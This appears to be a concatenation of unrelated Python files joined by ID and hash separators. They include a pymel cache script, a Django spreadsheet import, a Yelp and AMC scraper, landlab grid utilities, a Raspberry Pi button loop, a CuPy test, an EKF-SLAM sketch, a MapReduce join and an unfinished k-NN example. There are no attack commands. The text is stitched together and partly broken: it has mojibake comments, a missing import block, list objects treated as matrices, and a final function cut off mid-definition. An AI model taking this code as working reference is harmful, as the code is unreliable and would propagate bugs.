# Resolve the pymel repository root from this script's own location and make
# it importable ahead of any installed pymel.
THIS_FILE = os.path.normpath(os.path.abspath(inspect.getsourcefile(lambda: None)))
THIS_DIR = os.path.dirname(THIS_FILE)
PYMEL_ROOT = os.path.dirname(THIS_DIR)
sys.path.insert(0, PYMEL_ROOT)
import pymel.internal.apicache as apicache
import pymel.internal.startup
import pymel.util as _util
logger = pymel.internal.startup._logger
# Load the shared API/MEL bridge cache, then fold its class overrides into
# every per-Maya-version ApiCache and re-save them.
# NOTE: Python 2 print statements — this script targets Maya's mayapy.
bridgeCache = apicache.ApiMelBridgeCache()
bridgeCache.load()
print "read: {}".format(bridgeCache.path())
for version in apicache.ApiCache.allVersions():
    cacheInst = apicache.ApiCache()
    cacheInst.version = version
    cacheInst.load()
    print "updating: {}".format(cacheInst.path())
    # Merge the bridge overrides on top of this cache's apiClassInfo in place.
    _util.mergeCascadingDicts(bridgeCache.apiClassOverrides, cacheInst.apiClassInfo,
                              allowDictToListMerging=True)
    cacheInst.save()
|
12,946 | 641c3e950944fe3c736c7abb8dc738c1f8a943a1 | import os, sys
os.environ['DJANGO_SETTINGS_MODULE'] = 'tinla.settings'
# Make the project root and its parent importable before Django models load.
ROOT_FOLDER = os.path.realpath(os.path.dirname(__file__))
ROOT_FOLDER = ROOT_FOLDER[:ROOT_FOLDER.rindex('/')]
if ROOT_FOLDER not in sys.path:
    sys.path.insert(1, ROOT_FOLDER + '/')
# also add the parent folder
PARENT_FOLDER = ROOT_FOLDER[:ROOT_FOLDER.rindex('/')+1]
if PARENT_FOLDER not in sys.path:
    sys.path.insert(1, PARENT_FOLDER)
import xlrd
from accounts.models import *
from catalog.models import *
from datetime import datetime
from dealprops.models import *
# One-off import script (Python 2): read deal products from a hard-coded
# spreadsheet and attach them to FridayDeal #1.
deal = FridayDeal.objects.get(id=1)
flag = True
sequence = 1
errors = []
skus = """
""".split("\n")
book = xlrd.open_workbook('/home/kishan/apps/tinla/scripts/freaking_friday_model.xls')
sh = book.sheet_by_index(0)
header = sh.row(0)
# NOTE(review): `map` shadows the builtin; it maps lower-cased header
# names to column indices.
map = {}
idx = 0
for idx in range(sh.ncols):
    map[header[idx].value.strip().lower()] = idx
errors = []
to_update = []
for row_count in range(1, sh.nrows):
    row = sh.row(row_count)
    try:
        article_id = row[map['articleid']].value
        sku = row[map['skuid']].value
        start_time = row[map['starttime']].value
        end_time = row[map['endtime']].value
        # xlrd yields numeric cells as floats; split('.')[0] strips the ".0".
        to_update.append({
            'article_id': str(article_id).split('.')[0],
            'sku':str(sku).split('.')[0],
            'start_time':start_time,
            'end_time':end_time,
        })
    except KeyError:
        flag = False
        errors.append('Unsupported excel file.')
# Validate every article id exists before writing anything.
for item in to_update:
    try:
        id = item['article_id']
        src = SellerRateChart.objects.get(article_id=id,seller__client=5)
    except:
        flag = False
        errors.append("SKU not found: %s" % id)
if flag:
    for item in to_update:
        id = item['article_id']
        src = SellerRateChart.objects.get(article_id=id,seller__client=5)
        prod = FridayDealProducts()
        prod.deal = deal
        prod.product = src.product
        prod.sequence = sequence*10
        prod.starts_on = datetime.strptime(item['start_time'],'%d-%m-%Y %I:%M:%S %p')
        prod.ends_on = datetime.strptime(item['end_time'],'%d-%m-%Y %I:%M:%S %p')
        prod.save()
        sequence += 1
        print "ADDED::",id
else:
    for err in errors:
        print err
|
12,947 | 4f1d9f74cacbfd148e387301040cdfb0f515dc9e | # Web Scraping Yelp
# Import requests, BeautifulSoup, and random library
import requests
from bs4 import BeautifulSoup
from random import randint,choice
# Scrape Yelp function
def ScrapeYelp(loc):
    """Scrape one random Yelp search-results page for restaurants near *loc*.

    Returns a de-duplicated list of (name, address) tuples; the address
    falls back to 'no address' when the listing lacks one.
    """
    base_url = 'https://www.yelp.com/search?find_desc=Restaurants&find_loc='
    restaurants = []
    # Randomly pick one of the first five result pages (30 results per page).
    page = randint(0,4) * 30  # (fix: removed dead `page = 0` and debug leftovers)
    url = base_url + loc + '&start=' + str(page)
    yelp_r = requests.get(url)
    # Parse html, find restaurant tabs, business name and address within each tab.
    # NOTE(review): these are Yelp's generated CSS class names and break
    # whenever Yelp redeploys — confirm they still match.
    yelp_soup = BeautifulSoup(yelp_r.text, 'html.parser')
    businessinfo = yelp_soup.findAll('div',{'class':'largerScrollablePhotos__373c0__3FEIJ'})
    for i in range(len(businessinfo)):
        busname = businessinfo[i].findAll('div',{'class':"businessName__373c0__1fTgn"})
        address = businessinfo[i].findAll('address',{'class':'lemon--address__373c0__2sPac'})
        try:
            # Strip the leading "N." ranking prefix from the business name.
            parts = busname[0].text.split('.')
            del parts[0]
            busname = ''.join(parts)
            restaurants.append((busname,address[0].text))
        except IndexError:  # fix: was a bare except; only empty findAll results are expected
            restaurants.append((busname,'no address'))
    restaurants = list(set(restaurants))
    return restaurants
# Define Scrape AMC function
def ScrapeAMC():
    """Return the titles of all movies currently listed on amctheatres.com."""
    url = 'https://www.amctheatres.com/movies'
    response = requests.get(url)
    soup = BeautifulSoup(response.text, 'html.parser')
    # Each poster grid holds the film title in its first <h3>.
    posters = soup.findAll('div', {'class': 'PosterContent'})
    return [poster.findAll('h3')[0].text for poster in posters]
# Define main function
def Main():
    """Prompt for a location, then print one random restaurant and one
    random movie as a date suggestion."""
    # Input location for yelp search
    loc = input('Where are you going on your date?: ')
    loc = loc.replace(' ','+')  # URL-encode spaces for the Yelp query string
    print('Your dinner and movie are being generated...')
    restaurants = ScrapeYelp(loc)
    movies = ScrapeAMC()
    # Randomly select dinner and movie
    food = choice(restaurants)
    movie = choice(movies)
    print('Dinner:', food[0], 'at', food[1])
    print('Movie: ',movie)
# Runs immediately on import — no __main__ guard in the original.
Main()
|
12,948 | 44f720dc02326fc9fb6ab7ab55a2a164ff9bbc6f | """
Utility functions that operate on landlab grids.
------------------------------------------------
"""
import numpy as np
def resolve_values_on_active_links(grid, active_link_values):
    """Resolve active-link values into x and y directions.

    Takes a set of values defined on active links, and returns those values
    resolved into the x and y directions, as a pair of link arrays.

    Parameters
    ----------
    grid : ModelGrid
        A ModelGrid.
    active_link_values : ndarray
        Values on active links.

    Returns
    -------
    tuple of ndarray
        Values resolved into x-component and y-component.
    """
    lengths = grid.length_of_link[grid.active_links]
    # Per-link direction components, tail (from-node) to head (to-node).
    dx = (
        grid.node_x[grid._activelink_tonode]
        - grid.node_x[grid._activelink_fromnode]
    )
    dy = (
        grid.node_y[grid._activelink_tonode]
        - grid.node_y[grid._activelink_fromnode]
    )
    return (dx / lengths * active_link_values,
            dy / lengths * active_link_values)
def resolve_values_on_links(grid, link_values):
    """Resolve link values into x and y directions.

    Takes a set of values defined on links, and returns those values
    resolved into the x and y directions, as a pair of link arrays.

    Parameters
    ----------
    grid : ModelGrid
        A ModelGrid.
    link_values : ndarray
        Values on links.

    Returns
    -------
    tuple of ndarray
        Values resolved into x-component and y-component.
    """
    # Per-link direction components, tail node to head node.
    dx = (
        grid.node_x[grid.node_at_link_head]
        - grid.node_x[grid.node_at_link_tail]
    )
    dy = (
        grid.node_y[grid.node_at_link_head]
        - grid.node_y[grid.node_at_link_tail]
    )
    return (dx / grid.length_of_link * link_values,
            dy / grid.length_of_link * link_values)
|
12,949 | cf25c933f98501d2525b96908e8bbf798f81fd85 |
import pigpio
import datetime
import time
highTrig = False
lastPress = datetime.datetime.now()
pi = pigpio.pi()
pi.set_mode(12, pigpio.INPUT)
def changeMode(pressTime):
    """Debounced toggle of the global highTrig flag.

    Flips highTrig only when at least 200 ms have elapsed since the global
    lastPress timestamp, and returns the current time (the caller stores it
    back into lastPress).
    """
    global highTrig
    if((pressTime - lastPress).total_seconds()*1000 >= 200):
        highTrig = not highTrig
        # fix: original was print(...).format(...) — print() returns None,
        # so .format raised AttributeError on every debounced press.
        print("debounced, flipping highTrig to {}".format(highTrig))
        print((pressTime - lastPress).total_seconds()*1000)
    return datetime.datetime.now()
# Poll GPIO 12 for a rising edge forever; on each detected press, run the
# debounce handler and record the press time.
# NOTE(review): presumably pigpio's wait_for_edge(gpio, edge, timeout) with a
# 10 ms timeout returning True on an edge — confirm against the pigpio docs.
while True:
    if pi.wait_for_edge(12, pigpio.RISING_EDGE, .01):
        pressed = datetime.datetime.now()
        lastPress = changeMode(pressed)
|
12,950 | e94922ca1837a949efbd7084916ea5567f0fc2f9 | from selenium.webdriver.common.by import By
from Pages.GoogleResultPage import GoogleResultPage
from Pages.Page import Page
class GoogleMainPage(Page):
    """Page object for the Google search landing page."""
    #SEARCH_INPUT = (By.NAME, 'q')
    SEARCH_INPUT = "//input[@name='q']"   # XPath locator for the search box
    SEARCH_BTN = "//input[@name='btnK']"  # XPath locator for the search button
    def __init__(self, driver):
        super().__init__(driver)
    def search_text(self, text):
        # Type the query, submit the form, and hand back a result-page object.
        self.find_element(self.SEARCH_INPUT).send_keys(text)
        self.find_element(self.SEARCH_BTN).submit()
return GoogleResultPage(self.driver) |
12,951 | 140371f2e93ee1d1023739bab8b119c1953bf3d0 | """
็ฅ็ป็ฝ็ปๅๅไผ ๆญ็ฎๆณ
"""
import tensorflow as tf
# ๅฎไนw1,w2ไธคไธชๅ้
w1 = tf.Variable(tf.random_normal([2,3],stddev=1,seed=1))
w2 = tf.Variable(tf.random_normal([3,1],stddev=1,seed=1))
# ๅฎไน่พๅ
ฅ
x = tf.constant([0.7,0.9],shape=(1,2))
print(x.shape)
# ๅ็ธไผ ๆญ
a = tf.matmul(x,w1)
y = tf.matmul(a,w2)
## ่ฟ็ฎ ##
sess = tf.InteractiveSession()
# ๅๅงๅๆๆๅ้๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผ๏ผๅพๅฎนๆๅฟ่ฎฐ
ops = tf.global_variables_initializer()
sess.run(ops)
print(sess.run(y))
sess.close()
|
12,952 | d044da7cf6b3ce1f2389a01a9be4f191262974d6 | zum,yum=map(int,input().split())
# Read a second coordinate pair and print the per-axis absolute differences
# from (zum, yum) read on the previous line.
lent,fen=map(int,input().split())
dx = abs(zum-lent)  # fix: renamed from `sum`, which shadowed the builtin
dy = abs(yum-fen)
print(dx,dy)
|
12,953 | 3b861e73e98129869ee483a1488c36a324acb04f | k=int(input());print(50,*[k//50+i+(i+k%50>49)for i in range(50)]) |
12,954 | f0b84cca16bf09b9add670c39c4488fd1f44616b | # -*- coding: utf-8 -*-
# Application-wide UI constants.
TITLE = "Boo's Writing ante-alpha 0.2"  # window title string
DEFAULT_SIZE = 800,600        # main window (width, height) — presumably pixels
INPUT_WINDOW_SIZE = 200,200   # input window (width, height) — presumably pixels
PROGRAM_ICON = 'ico/logo.png' |
12,955 | a5f72b36ddaaa7b0a2ceb60d774b4bd6cd4db8d7 | class Stack:
    def __init__(self):
        """Initialize an empty stack backed by a Python list (class baseline)."""
        self.items = []
    def push(self, item):
        """Append *item* to the top of the stack (end of the backing list)."""
        self.items.append(item)
def pop(self):
"""return and Remove the last element from the Stack, items does this natively"""
if self.items:
return self.items.pop()
return None
def peek(self):
"""look at the last item on the stack, without removing"""
if self.items:
return self.items[-1]
return None
    def size(self):
        """Return the number of items currently on the stack."""
        return len(self.items)
def is_empty(self):
"""Return true or false if there are any items in the list"""
return self.items == []
|
12,956 | 33a50df66c8d1ab0244833655f46c2313c48ffd3 | import tensorflow as tf
import random
import numpy as np
class Reinforce():
    """REINFORCE-style policy-gradient controller (TF1 graph mode) that
    proposes hyperparameters and is updated from observed rewards."""
    def __init__(self,
                 sess,
                 optimizer,
                 policy_network,
                 max_layers,
                 global_step,
                 division_rate= 100.0,
                 reg_param=0.001,
                 discount_factor=0.99,
                 exploration=0.3):
        '''
        Notation:
            policy network : used describe model that predicts hyperparameters
            learned network : learned network with hyper params as recommended
        Args:
            sess: tensorflow session
            optimizer : type of optimization algorithm used for minimization
            policy network : final tensorflow output state of the policy network
            max_layers: the maximum number of layers for the learned neural network
            global_step : number of cycles of learning of policy network (i.e. gradient updates)
            reg_param : lambda for l2 regularization of loss of policy network
            discount_factor : as stated
            exploration : not used for anything right now (but meant for random exploration)
        '''
        self.sess = sess
        self.optimizer = optimizer
        self.policy_network = policy_network
        self.division_rate = division_rate
        self.reg_param = reg_param
        self.discount_factor=discount_factor
        self.max_layers = max_layers
        self.global_step = global_step
        self.reward_buffer = []
        self.state_buffer = []
        self.create_variables()
        # Initialize every variable the graph construction above created.
        var_lists = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
        self.sess.run(tf.variables_initializer(var_lists))
    def get_action(self, state):
        '''Given the state of the neural network (rewards so far are stored
        internally as member variables) get new state.
        '''
        return self.sess.run(self.predicted_action, {self.states: state})
    def create_variables(self):
        # Builds the TF1 graph: input placeholder, policy forward pass,
        # REINFORCE loss, and reward-scaled gradient updates.
        with tf.name_scope("model_inputs"):
            # raw state representation
            self.states = tf.placeholder(tf.float32, [None, self.max_layers*4], name="states")
        with tf.name_scope("predict_actions"):
            # initialize policy network
            with tf.variable_scope("policy_network"):
                # In this case this is just the final state of the RNN
                self.policy_outputs = self.policy_network(self.states,
                                                          self.max_layers)
            # Identity is used to remember the last policy_output; how
            # tf.identity works isn't completely clear to me but for
            # now I'll trust that this works: it's basically deep copy
            self.action_scores = tf.identity(self.policy_outputs,
                                             name="action_scores")
            # Scale them and cast them into int:
            # Note this doesn't depend on the reward
            # All that matters is the hidden weights of my policy controller
            # The reward is used to update those weights
            self.predicted_action = tf.cast(tf.scalar_mul(self.division_rate, self.action_scores),
                                            tf.int32,
                                            name="predicted_action")
        # regularization loss
        policy_network_variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="policy_network")
        # compute loss and gradients
        with tf.name_scope("compute_gradients"):
            # gradients for selecting action from policy network
            self.discounted_rewards = tf.placeholder(tf.float32, (None,), name="discounted_rewards")
            with tf.variable_scope("policy_network", reuse=True):
                self.logprobs = self.policy_network(self.states,
                                                    self.max_layers)
            print("self.logprobs", self.logprobs)
            # compute policy loss and regularization loss
            self.cross_entropy_loss = tf.nn.softmax_cross_entropy_with_logits(logits=self.logprobs[:, -1, :],
                                                                              labels=self.states)
            self.pg_loss = tf.reduce_mean(self.cross_entropy_loss)
            self.reg_loss = tf.reduce_sum([tf.reduce_sum(tf.square(x)) for x in policy_network_variables]) # L2 by the look of it Regularization
            self.loss = self.pg_loss + self.reg_param * self.reg_loss
            #compute gradients
            self.gradients = self.optimizer.compute_gradients(self.loss)
            # compute policy gradients: scale every gradient by the reward
            for i, (grad, var) in enumerate(self.gradients):
                if grad is not None:
                    self.gradients[i] = (grad * self.discounted_rewards, var)
            # training update
            with tf.name_scope("train_policy_network"):
                # apply gradients to update policy network
                self.train_op = self.optimizer.apply_gradients(self.gradients,
                                                               global_step=self.global_step)
    def storeRollout(self, state, reward):
        '''Caching for the win: for long running programs this is a shite
        solution
        '''
        self.reward_buffer.append(reward)
        self.state_buffer.append(state[0])
    def train_step(self, steps_count):
        '''
        This is where policy gradient happens,
        but to understand this also understand create_variables.
        steps_count: how many previous states to consider
        '''
        # take the last steps_count number of states
        states = np.array(self.state_buffer[-steps_count:])/self.division_rate
        # rewards are never discounted
        rewars = self.reward_buffer[-steps_count:]
        _, ls = self.sess.run([self.train_op, self.loss],
                              {self.states: states,
                               self.discounted_rewards: rewars})
        return ls
|
12,957 | c0a183e319faf01f32cf486e22ef1020c6844ef7 | # -*- coding: utf-8 -*-
"""
Created on Fri Mar 19 13:30:38 2021
# Author: Timon Merk <timon.merk95@gmail.com>
"""
import numpy as np
import mne
def calc_band_filters(f_ranges, sfreq, filter_length="1000ms", l_trans_bandwidth=4, h_trans_bandwidth=4):
    """Calculate bandpass FIR filters for the given frequency ranges.

    One MNE ``firwin`` filter is designed per (low, high) pair in
    ``f_ranges`` so the filters can be applied sequentially for band-power
    estimation.

    Parameters
    ----------
    f_ranges : list of lists
        (low, high) frequency ranges.
    sfreq : float
        sampling frequency.
    filter_length : str, optional
        human-readable filter length (e.g. "1000ms" or "1s").
    l_trans_bandwidth : float, optional
        width of the lower transition band. Default 4.
    h_trans_bandwidth : float, optional
        width of the upper transition band. Default 4.

    Returns
    -------
    filter_bank : ndarray, shape (n_franges, filter length samples)
        stacked filter coefficients, one row per frequency range.
    """
    coefficients = [
        mne.filter.create_filter(
            None, sfreq, l_freq=band[0], h_freq=band[1], fir_design='firwin',
            l_trans_bandwidth=l_trans_bandwidth,
            h_trans_bandwidth=h_trans_bandwidth,
            filter_length=filter_length)
        for band in f_ranges
    ]
    return np.vstack(coefficients)
def apply_filter(data, filter_bank, sfreq):
    """Apply previously calculated (bandpass) filters to data.

    Parameters
    ----------
    data : array (n_samples,) or (n_channels, n_samples)
        segment of data; a 1-D array is treated as a single channel.
    filter_bank : array, shape (n_fbands, filter_len)
        output of calc_band_filters.
    sfreq : float
        sampling frequency; truncated to int for the output window length
        (fix: a float sfreq previously crashed np.zeros with a non-integer
        shape, even though the docstring advertised float).

    Returns
    -------
    filtered : array, shape (n_chan, n_fbands, sfreq)
        the filtered signal at each frequency band; 1-D input yields
        n_chan == 1, matching the original behavior.
    """
    sfreq = int(sfreq)
    chans = np.atleast_2d(data)  # unifies the old separate 1-D / 2-D branches
    filtered = np.zeros((chans.shape[0], filter_bank.shape[0], sfreq))
    # Keep the centered window of the full convolution (length == sfreq).
    lo = int(sfreq - sfreq / 2)
    hi = int(sfreq + sfreq / 2)
    for chan in range(chans.shape[0]):
        for filt in range(filter_bank.shape[0]):
            filtered[chan, filt, :] = np.convolve(filter_bank[filt, :], chans[chan, :])[lo:hi]
    return filtered
|
12,958 | 963ce771abfe1606a70cdb66132ea33a86e790e7 | import unittest
import cupy
from cupy import testing
import cupyx.scipy.linalg
import numpy
import pytest
try:
import scipy.linalg
_scipy_available = True
except ImportError:
_scipy_available = False
@testing.parameterize(*testing.product({
    'trans': [0, 1, 2, 'N', 'T', 'C'],
    'lower': [True, False],
    'unit_diagonal': [True, False],
    'overwrite_b': [True, False],
    'check_finite': [True, False],
}))
@testing.with_requires('scipy')
class TestSolveTriangular(unittest.TestCase):
    # Parameterized comparison of cupyx.scipy.linalg.solve_triangular against
    # SciPy's reference implementation across every flag combination above.

    @testing.for_dtypes('fdFD')
    def check_x(self, a_shape, b_shape, dtype):
        # Build a random triangular system, solve on CPU and GPU, and verify
        # matching dtype/values; also verify inputs are only mutated when
        # overwrite_b allows it.
        a_cpu = numpy.random.randint(1, 10, size=a_shape).astype(dtype)
        b_cpu = numpy.random.randint(1, 10, size=b_shape).astype(dtype)
        a_cpu = numpy.tril(a_cpu)
        if self.lower is False:
            a_cpu = a_cpu.T
        if self.unit_diagonal is True:
            numpy.fill_diagonal(a_cpu, 1)
        a_gpu = cupy.asarray(a_cpu)
        b_gpu = cupy.asarray(b_cpu)
        a_gpu_copy = a_gpu.copy()
        b_gpu_copy = b_gpu.copy()
        result_cpu = scipy.linalg.solve_triangular(
            a_cpu, b_cpu, trans=self.trans, lower=self.lower,
            unit_diagonal=self.unit_diagonal, overwrite_b=self.overwrite_b,
            check_finite=self.check_finite)
        result_gpu = cupyx.scipy.linalg.solve_triangular(
            a_gpu, b_gpu, trans=self.trans, lower=self.lower,
            unit_diagonal=self.unit_diagonal, overwrite_b=self.overwrite_b,
            check_finite=self.check_finite)
        assert result_cpu.dtype == result_gpu.dtype
        cupy.testing.assert_allclose(result_cpu, result_gpu, atol=1e-3)
        # `a` must never be modified; `b` only when overwrite_b was requested.
        cupy.testing.assert_array_equal(a_gpu_copy, a_gpu)
        if not self.overwrite_b:
            cupy.testing.assert_array_equal(b_gpu_copy, b_gpu)
    def test_solve(self):
        self.check_x((4, 4), (4,))
        self.check_x((5, 5), (5, 2))
        self.check_x((5, 5), (5, 5))
    def check_shape(self, a_shape, b_shape):
        # Incompatible shapes must raise ValueError on both backends.
        for xp, sp in ((numpy, scipy), (cupy, cupyx.scipy)):
            a = xp.random.rand(*a_shape)
            b = xp.random.rand(*b_shape)
            with pytest.raises(ValueError):
                sp.linalg.solve_triangular(
                    a, b, trans=self.trans, lower=self.lower,
                    unit_diagonal=self.unit_diagonal,
                    overwrite_b=self.overwrite_b,
                    check_finite=self.check_finite)
    def test_invalid_shape(self):
        self.check_shape((2, 3), (4,))
        self.check_shape((3, 3), (2,))
        self.check_shape((3, 3), (2, 2))
        self.check_shape((3, 3, 4), (3,))
    def check_infinite(self, a_shape, b_shape):
        # Inject inf into both operands; must raise ValueError on both backends.
        for xp, sp in ((numpy, scipy), (cupy, cupyx.scipy)):
            a = xp.random.rand(*a_shape)
            b = xp.random.rand(*b_shape)
            a[(0,) * a.ndim] = numpy.inf
            b[(0,) * b.ndim] = numpy.inf
            with pytest.raises(ValueError):
                sp.linalg.solve_triangular(
                    a, b, trans=self.trans, lower=self.lower,
                    unit_diagonal=self.unit_diagonal,
                    overwrite_b=self.overwrite_b,
                    check_finite=self.check_finite)
    def test_infinite(self):
        # Non-finite input is only rejected when check_finite is enabled.
        if self.check_finite:
            self.check_infinite((4, 4), (4,))
            self.check_infinite((5, 5), (5, 2))
            self.check_infinite((5, 5), (5, 5))
|
12,959 | 4641a3c68702f4da7273baca991f6f692b6399e4 | import numpy as np
# import cov_matrix
from landmarks import get_DB, get_DB_size
DBSize = get_DB_size()
landmarkDB = get_DB()
landmarks = landmarkDB[:DBSize]
C = 1.0 # const for gaussin sample
c = 0.01
d = 1.0
V = np.matrix([[1, 1], # V is just 2 by 2 identity matrix
[1, 1]],
dtype='float')
A = np.matrix([[1, 0, 0], # jacobian of the prediction model
[0, 1, 0],
[0, 0, 1]],
dtype='float')
H = np.matrix([[0, 0, 0], # jacobian of the measurement model
[0, 0, 0]],
dtype='float')
X = np.matrix([[0], # system state
[0],
[0]],
dtype='float')
P = np.matrix([[0, 0, 0], # default - np.cov(x[:3],x[:3])
[0, 0, 0], # covariance matrix
[0, 0, 0]],
dtype='float')
R = np.matrix([[1, 0],
[0, 1]],
dtype='float')
Jxr = np.matrix([[1, 0, 0],
[0, 1, 0]],
dtype='float')
Jz = np.matrix([[0, 0],
[0, 0]],
dtype='float')
x = y = th = 0
def main(robot_position, dposition, landmarkDB, DBSize):
    """One EKF-SLAM iteration: predict (step 1), correct against known
    landmarks (step 2), and augment the state with a new landmark (step 3).

    Returns the corrected (x, y, theta) rounded to 6 decimals. Operates on
    the module-level state/covariance globals (X, P, A, H, ...).

    fix: `math` was used (math.sqrt / math.atan) but never imported,
    guaranteeing a NameError in step 2; imported locally below.
    """
    import math
    # A = [[1,0,-dy],[0,1,dx],[0,0,1]] - matrix
    #
    # Hus = [[(x-lx)/r,(y-ly)/r,0],[(ly-y)/r**2,(lx-x)/r**2,-1]]
    # H - matrix
    # ---------------------------
    # xr|yr|tr|x1|y1|x2|y2|x3|y3|
    # ---------------------------
    # A |B |C | | |-A|-B| | |
    # D |E |F | | |-D|-E| | |
    # ---------------------------
    # A - (x-lx)/r, B - (y-ly)/r, D - (ly-y)/r**2, E - (lx-x)/r**2
    #
    # x, y, z
    global x, y, th, V, A, H, P, X, c, C, d, R, Jxr, Jz
    landmarkDB = landmarkDB[:DBSize]
    """ step 1 """
    # Prediction: apply the odometry delta to the pose and propagate the
    # pose covariance through the motion Jacobian A with process noise Q.
    dx = dposition[0]
    dy = dposition[1]
    dth = dposition[2]
    x = robot_position[0]
    y = robot_position[1]
    th = robot_position[2]
    x += dx
    y += dy
    th += dth
    X[0], X[1], X[2] = x, y, th
    A[0, 2] = -dy
    A[1, 2] = dx
    Q = [[C*dth**2, C*dx*dy, C*dx*dth],
         [C*C*dy*dx, C*dy**2, C*dy*dth],
         [C*dth*dx, C*dth*dy, C*dth**2]]
    Prr = P[:3, :3]
    # NOTE(review): standard EKF propagation is A*P*A.T + Q; this uses A*P*A.
    Prr = A*Prr*A + Q  # top left 3*3 of P
    P[:3, :3] = Prr
    Pri = P[:3, :]
    Pri = A*Pri  # top 3 rows of P
    P[:3, :] = Pri
    # NOTE(review): both assignments target Jxr[0, 2]; the second overwrites
    # the first — the sin term is lost. Confirm intended indices.
    Jxr[0, 2] = -dth * np.sin(th)
    Jxr[0, 2] = dth * np.cos(th)
    Jz = np.matrix([[np.cos(th), -dth*np.cos(th)],  # not sure, maybe th+dth
                    [np.sin(th), dth*np.cos(th)]])
    """ step 2 """
    # Correction: for each known landmark compute the expected measurement h,
    # the measurement Jacobian H, Kalman gain K, and update the state X.
    for i, landmark in enumerate(landmarks):
        lx, ly = landmark.pos
        lrange = landmark.range_
        lbearing = landmark.bearing
        range_ = math.sqrt((lx-x)**2 + (ly-y)**2) + lrange
        bearing = math.atan((ly-y) / (lx-x)) - th + lbearing
        h = np.matrix([[range_], [bearing]])
        # NOTE(review): H is an np.matrix, so H[0][0] selects a whole row and
        # these assignments broadcast across it — confirm H[0, 0]-style
        # indexing was intended.
        H[0][0] = (x-lx) / range_
        H[0][1] = (y-ly) / range_
        H[1][0] = (y-ly) / bearing**2
        H[1][1] = (x-lx) / bearing**2
        try:
            H[1 + i*2] = -H[0][0]  # 3+i*2-1 -1
            H[2 + i*2] = -H[0][1]  # 3+i*2 -1
            H[1 + i*2] = -H[1][0]  # check it
            H[2 + i*2] = -H[1][1]
        except IndexError:
            # NOTE(review): np.append does not modify H in place; this
            # discards the grown matrix. Confirm.
            temp = np.matrix([[-H[0][0], -H[0][1]], [-H[1][0], -H[1][1]]])
            np.append(H, temp)
        r = R[0, 0]
        b = R[1, 1]
        R = [[r*c, 0], [0, b*d]]
        try:
            K = P * H.T * (H*P*H.T + V*R*V.T)**(-1)
            S = H*P*H.T + V*R*V.T  # NOTE(review): S is computed but unused
        except np.linalg.linalg.LinAlgError:
            print('Nothing to correct')
            K = 1
        X = X + K*(h)  # z-h
    """ step 3 """
    # Augmentation: append the last-seen landmark position to X and grow P
    # with its covariance block.
    land_pos = np.matrix([[lx], [ly]], dtype='float')
    # first we add the new landmark to the state vector X
    X = np.append(X, land_pos, axis=0)
    # we add the covariance for the new landmark in the cell C
    # P^(N+1,N+1) = Jxr*P*Jxr.T + Jz*R*Jz.T
    mass = []  # add the row of covariance to the P
    cov_C = np.cov(land_pos, land_pos, rowvar=0)  # , ddof=0)
    for i, lm in enumerate(landmarkDB):
        if i != DBSize:
            lm_pos = np.matrix([[lm.pos[0]], [lm.pos[1]]], dtype='float')
            cov_F = np.cov(land_pos, lm_pos, rowvar=0)
            mass.append(cov_F)
    P = np.append(P, mass, axis=0)
    # NOTE(review): `mass` is a plain list, so mass.T will raise
    # AttributeError — this path looks unfinished. Confirm.
    column = mass.T
    column = np.append(column, cov_C, axis=0)
    P = np.append(P, column, axis=0)
    return round(X[0, 0], 6), round(X[1, 0], 6), round(X[2, 0], 6)
# round doesn't work
if __name__ == "__main__":
from landmarks import DBSize, landmarkDB
print(main([5, 5, 0.5], [1, 1, 0.1], landmarkDB, DBSize))
|
12,960 | ac846558d704e11460326519576a0e2c035ef8f4 | from .user import User
from .menu import Menu
from .menu_auth_group import MenuAuthGroup
|
12,961 | 3e1c39305c0988ec551c4c91890acc7294b1cd0e | import MapReduce
import sys
mr = MapReduce.MapReduce()
# =============================
# Do not modify above this line
def mapper(record):
    # Group records by their second field — the join key shared by both
    # input tables in this MapReduce join exercise.
    key = record[1]
    mr.emit_intermediate(key,record)
def reducer(key, list_of_values):
    """Emit the concatenation of the first record under *key* with each
    subsequent record (a simple relational join: the first grouped record is
    treated as the "head" row)."""
    head = list_of_values[0]
    for pos in range(1, len(list_of_values)):
        # fix: renamed from `list`, which shadowed the builtin
        joined = head + list_of_values[pos]
        mr.emit(joined)
# Do not modify below this line
# =============================
if __name__ == '__main__':
inputdata = open(sys.argv[1])
mr.execute(inputdata, mapper, reducer)
|
12,962 | 0242bfe78a60c9d363e8e300f0721418f39ebf87 | import numpy as np
import matplotlib.pyplot as plot
grape = [8, 5]
fish = [2, 3]
carrot = [7, 10]
orange = [7, 3]
celery = [3, 8]
cheese = [1, 1]
category = ['๊ณผ์ผ', '๋จ๋ฐฑ์ง', '์ฑ์', '๊ณผ์ผ', '์ฑ์', '๋จ๋ฐฑ์ง']
# ๋ถ๋ฅ๋์
dan = int(input('๋จ๋ง ์
๋ ฅ(1~10):'))
asac = int(input('์์ญ๊ฑฐ๋ฆผ ์
๋ ฅ(1~10):'))
target = [dan, asac]
def data_set():
    """Assemble the k-NN training data from the module-level food samples.

    Returns (dataset, class_target, class_category) where ``class_target``
    repeats the module-level ``target`` once per sample so it can be
    subtracted element-wise from ``dataset``.
    """
    samples = np.array([grape, fish, carrot, orange, celery, cheese])  # training set
    repeated_target = np.tile(target, (len(samples), 1))               # query point, tiled
    labels = np.array(category)                                        # category labels
    return samples, repeated_target, labels
# dataset ์์ฑ
dataset, class_target, class_categoty = data_set() # data_set()ํจ์ ํธ์ถ
def classify(dataset, class_target, class_categoty, k):
    """k-NN vote: count the categories of the k samples nearest the query.

    ``class_target`` is the query point tiled to ``dataset``'s shape.
    Returns a dict {category: vote count} over the k nearest neighbours.
    (Parameter name ``class_categoty`` kept as-is for callers.)
    """
    # Euclidean distance from the query to every sample, computed row-wise.
    distances = np.sqrt(((class_target - dataset) ** 2).sum(axis=1))
    # Indices of samples ordered by increasing distance.
    nearest = distances.argsort()
    votes = {}
    for idx in nearest[:k]:
        label = class_categoty[idx]
        votes[label] = votes.get(label, 0) + 1
    return votes
# ํจ์ ํธ์ถ
k = int(input('k๊ฐ ์
๋ ฅ(1~3):'))
class_result = classify(dataset, class_target, class_categoty, k) # classify()ํจ์ํธ์ถ
print(class_result)
# ๋ถ๋ฅ๊ฒฐ๊ณผ ์ถ๋ ฅ ํจ์ ์ ์
def classify_result(class_result):
